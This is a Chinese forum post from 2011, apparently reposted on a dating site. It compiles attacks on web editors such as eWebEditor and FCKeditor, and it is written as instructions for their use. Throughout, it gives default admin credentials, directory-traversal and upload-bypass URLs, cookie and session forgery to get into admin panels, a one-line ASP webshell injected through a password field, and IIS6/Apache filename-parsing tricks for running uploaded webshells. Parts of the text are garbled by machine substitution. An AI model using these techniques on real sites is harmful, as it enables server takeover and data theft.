找回密码
 赶紧注册吧

QQ登录

只需一步,快速开始

查看: 9867|回复: 0
打印 上一主题 下一主题

翻开后即可上传文件 [复制链接]

注意:1、各网友务必提高交友安全意识,不要轻易参加非天府交友网官方举办的见面交友活动,以防酒托,饭托或引发其他危险;请详细阅读《天府交友网服务条款》和《免责申明》!

Rank: 1

升级  10%

跳转到指定楼层
楼主
发表于 2011-11-4 13:21:30 |只看该作者 |倒序浏览
eWebEditor踩足迹式入侵
脆弱描述:
当我们下载数据库后查问不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有先辈入侵过 或许已经赋予了某控件上传脚本的才能,构造地址来上传我们自己的WEBSHELL.
攻击利用:
好比   ID=46     s-name =standard1
构造 代码:   ewebeditor.asp?id=content&style=standard
             ID和和样式名改过后
             ewebeditor.asp?id=46&style=standard1
eWebEditor遍历目录漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
过滤不严,造成遍历目录漏洞
攻击利用:
第一种:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir= 看到全部网站文件了
第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目录漏洞
懦弱描写:
ewebeditor/asp/browse.asp
过滤不严,造成遍历目录破绽
攻打应用:
利用WebEditor session诈骗漏洞,进入后台
脆弱描述:
漏洞文件:Admin_Private.asp
只断定了session,不判定cookies跟路径的验证问题。
袭击利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问test.asp,再访问后台任何文件,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上传漏洞
攻击利用:(请修改action字段为指定网址)
ewebeditor asp版2.1.6上传漏洞利用程序.html
使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有些管理员以及一些CMS,就是这么设置的)
点击“样式管理”--可以抉择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只有是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
2、当数据库被治理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,而后一句话木马客户端衔接拿下webshell
3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以自定义上传路径的!!!
4、设置好了上传类型,仍然上传不了麽?估计是文件代码被改了,可以尝试设定“远程类型”按照6.0版本拿SHELL的方法来做(详情见下文↓),可能设定自动保存远程文件的类型。
5、不能增加工具栏,但设定好了某款式中的文件类型,怎么办?↓这么办!
(请修改action字段)
Action.html
FCKeditor被动制约策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File类别默认谢绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
eWebEditorNet upload.aspx 上传漏洞(WebEditorNet)
脆弱描述:
WebEditorNet 重要是一个upload.aspx文件存在上传漏洞。
攻击利用:
默认上传地址:/ewebeditornet/upload.aspx
可以直接上传一个cer的木马
如果不能上传则在浏览器地址栏中输入javascript:lbtnUpload.click();
胜利当前查看源代码找到uploadsave查看上传保留地址,默认传到uploadfile这个文件夹里。
southidceditor(个别使用v2.8.0版eWeb中心)
idceditor/datas/southidceditor.mdb">
bigcneditor(eWeb 2.7.5 VIP核心)
实在所谓的Bigcneditor就是eWebEditor 2.7.5的VIP用户版.之所以无法访问admin_login.asp,提示“权限不够”4字真言,估量就是由于其受权“Licensed”问题,或者只容许被授权的机器访问后台才对。
或许上面针对eWebEditor v2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor在线编辑器本地包括漏洞
影响版本:
CuteEditor For Net 6.4
脆弱描述:
可以随便查看网站文件内容,迫害较大。
攻击利用:
--------------------------------------------------------------------------------
Webhtmleditor
利用WIN 2003 IIS文件名称解析漏洞取得SHELL
影响版本:<= Webhtmleditor终极版1.7 (已结束更新)
脆弱描述/攻击利用:
对上传的图片或其余文件无重命名操作,导致许可歹意用户上传diy.asp;.jpg来绕过对后缀名审查的限度,对此类因编辑器作者意识犯下的过错,就算遭受缩略图,文件头检测,也可使用图片木马 插入一句话来冲破。
--------------------------------------------------------------------------------
Kindeditor
利用WIN 2003 IIS文件名称解析漏洞失掉SHELL
影响版本: <= kindeditor 3.2.1(09年8月份宣布的最新版)
脆弱描述/攻击利用:
拿官方做个演示:进入upload/2010/3/201003102334381513.jpg 大家可以前去围观。
Note:参见附录C原懂得析。
--------------------------------------------------------------------------------
Freetextbox
Freetextbox遍历目录漏洞
影响版本:未知
脆弱描述:
因为ftb.imagegallery.aspx代码中 只过滤了/但是没有过滤/符号所以导致呈现了遍历目录的问题。
攻击利用:
在编纂器页面点图片会弹出一个框(抓包得到此地址)结构如下,可遍历目录。
--------------------------------------------------------------------------------
附录A:
Apache文件名解析缺陷漏洞:
测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.国外(SSR TEAM)发了多个advisory称Apache's MIME module (mod_mime)相关漏洞,就是attack.php.rar会被当做php文件执行的漏洞,包括Discuz!那个p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
eWebEditor for php任意文件上传漏洞
影响版本:ewebeditor php v3.8 or older version
脆弱描述:
此版本将所有的作风配相信息保存为一个数组$aStyle,在php.ini配置register_global为on的情形下咱们可以任意增添本人爱好的风格,并定义上传类型。
攻击利用:
phpupload.html
Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件
上传后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀
直接导致在win下在上传文件后面加个.来打破[未测试]
而在apache下,因为"Apache文件名解析缺点漏洞"也可以利用之,详见"附录A"
查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
By cloie, in ph4nt0m.net(c) Security.
另倡议其他上传漏洞中定义TYPE变量时使用File种别来上传文件,根据FCKeditor的代码,其限制最为狭窄。
攻击利用:
答应其他任何后缀上传
Note:[Hell1]原作:
XML页面中第二行 “url=/xxx”的局部就是默认基准上传路径
2.S4T的superhei在blog上发布了这个apache的小特征,即apache 是从后面开端检查后缀,按最后一个合法后缀执行。其实只要看一下apache的htdocs那些默认安装的index.XX文件就清楚了。
3.superhei已经说的十分明白了,可以充足利用在上传漏洞上,我依照广泛允许上传的文件格式测试了一下,列举如下(乱分类勿怪)
典范型:rar
备份型:bak,lock
流媒体型:wma,wmv,asx,as,mp4,rmvb
微软型:sql,chm,hlp,shtml,asp
任意型:test,fake,ph4nt0m
特别型:torrent
程序型:jsp,c,cpp,pl,cgi
4.整个漏洞的要害就是apache的"合法后缀"到底是哪些,不是"正当后缀"的都可以被利用。
5.测试环境
a.php
<? phpinfo();?>
然后增添任意后缀测试,a.php.aaa,a.php.aab....
eWebEditor2.8.0最终版删除任意文件漏洞
脆弱描述:
此漏洞存在于Example/NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,毋庸登陆可以直接进入。
攻击利用: (请修改action字段为指定网址)
Del Files.html
FCKeditor 消息组件遍历目录漏洞
影响版本:aspx版FCKeditor,其余版本未测试
脆弱描述:如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”
攻击利用:
修改CurrentFolder参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
依据返回的XML信息可以查看网站所有的目录。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上传方式
影响版本:非优化/精简版本的FCKeditor
软弱描述:
如果存在以下文件,打开后即可上传文件。
攻击利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor 文件上传“.”变“_”下划线的绕过方式
影响版本: FCKeditor => 2.4.x
脆弱描述:
我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变更。
攻击利用:
提交1.php+空格 就能够绕从前所有的,
※不过空格只支撑win体系 *nix是不支持的[1.php和1.php+空格是2个不同的文件]
Note:upload/2010/3/201003102334372778.jpg 这样的格式做了过滤。也就是IIS6解析漏洞。
上传第一次。被过滤为123_asp;123.jpg 从而无法运行。
然而第2次上传同名文件123.asp;123.jpg后。因为”123_asp;123.jpg”已经存在。
文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方法。
所以。IIS6的漏洞持续履行了。
eWebEditor JSP版漏洞
大同小异,我在本文档不想多说了,因为没环境 测试,网上垃圾场那么大,不好排查。用JSP编辑器的我感到eweb会比FCKeditor份额少得多。
给出个连接:
还有:
eWebEditor 2.8 商业版插一句话木马
影响版本:=>2.8 贸易版
攻击利用:
登陆后台,点击修改密码---新密码设置为 1":eval request("h")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
eWebEditor v6.0.0 上传漏洞
攻击利用:
在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址(注:文件名称必需为:xxx.jpg.asp 以此类推…),断定后,点击“远程文件自动上传”控件(第一次上传会提醒你装置控件,稍等即可),查看“代码”模式找到文件上传路径,拜访即可,eweb官方的DEMO也可以这么做,不外对上传目录撤消掉了执行权限,所以上传上去也无奈执行网马.
eWebEditor PHP/ASP…后台通杀漏洞
影响版本: PHP ≥ 3.0~3.8与asp 2.8版也通用,也许低版本也可以,有待测试。
攻击利用:
进入后台/eWebEditor/admin/login.php,随意输入一个用户和密码,会提示犯错了.
这时候你清空阅读器的url,然后输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
而后三次回车,清空浏览器的URL,当初输入一些平凡访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。
查看编辑器版本
FCKeditor/_whatsnew.html
Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6
        [Hell2]记得修正其中两处asp为FCKeditor实际应用的脚本语言
FCKeditor PHP上传任意文件漏洞
影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在处置文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。
成功攻击请求config.php配置文件中启用文件上传,而默认是禁用的。攻击利用: (请修改action字段为指定网址):
FCKeditor 《=2.4.2 for php.html
Note:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但留神,假如换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
如果通过上面的步骤进行测试没有成功,可能有以下多少方面的起因:
1.FCKeditor没有开启文件上传功能,这项功效在安装FCKeditor时默认是封闭的。如果想上传文件,FCKeditor会给出毛病提示。
2.网站采取了精简版的FCKeditor,精简版的FCKeditor良多功能丧失,包含文件上传功能。
3.FCKeditor的这个漏洞已经被修复。
--------------------------------------------------------------------------------
eWebEditor
eWebEditor利用基本常识
默认后盾地址:/ewebeditor/admin_login.asp
提议最好检测下admin_style.asp文件是否可以直接访问
默认数据库路径:[PATH]/db/ewebeditor.mdb
                [PATH]/db/db.mdb            -- 某些CMS里是这个数据库
也可尝试        [PATH]/db/%23ewebeditor.mdb -- 某些管理员自作聪慧的小手法
TYPE自定义变量任意上传文件漏洞
影响版本: 较早版本
脆弱描述:
通过自定义Type变量的参数,可以创立或上传文件到指定的目录中去,且没有上传文件格式的限制。
攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
翻开这个地址就可以上传任何类型的文件了,Shell上传到的默认地位是:
"Type=all" 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比方输入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
网马就可以传到网站的根目录下.
Note:如找不到默认上传文件夹可检讨此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
eWebEditor 2.7.0 注入漏洞
攻击利用:
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解.
附录B:
安装了iis6的服务器(windows2003),受影响的文件名后缀有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩大名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等
分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏0

使用道具 举报

※为保护您的个人隐私,防止被恶意盗用,在论坛中不得留下手机、QQ、邮箱等联系方式,否则将被屏蔽!,若有需要,请发送站内消息
您需要登录后才可以回帖 登录 | 赶紧注册吧

关于我们|网站地图|帮助中心|商务合作|法律声明|诚聘英才|联系我们| 时尚 娱乐 成都婚庆公司 网站制作天府星空
Copyright © 2010-2011 天府交友(Www.Tflove.Com)版权所有